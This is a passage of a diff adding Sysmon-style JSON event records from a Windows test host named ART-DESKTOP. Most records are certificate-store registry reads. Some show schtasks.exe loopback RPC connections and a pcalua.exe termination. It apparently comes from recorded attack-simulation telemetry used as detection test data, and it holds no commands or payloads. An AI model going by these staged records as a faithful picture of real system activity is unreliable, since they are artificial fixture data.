"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Media.Devices.dll", + "image_path": "C:\\Windows\\System32\\Windows.Media.Devices.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "135", + "event_type": "network", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "50509", + "subtype": "outgoing", + "timestamp": 131883573971910000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "50509", + "event_type": "network", + "pid": 928, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "135", + "subtype": "incoming", + "timestamp": 131883573971920000, + "unique_pid": "{42FC7E13-B293-5C05-0000-001038180100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "49667", + "event_type": "network", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "50510", + "subtype": "outgoing", + "timestamp": 131883573971940000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "50510", + "event_type": "network", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "49667", + "subtype": "incoming", + "timestamp": 131883573971940000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883573997490000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883573997490000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574007050000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_value": "W32:000000000008056A", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "terminate", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": 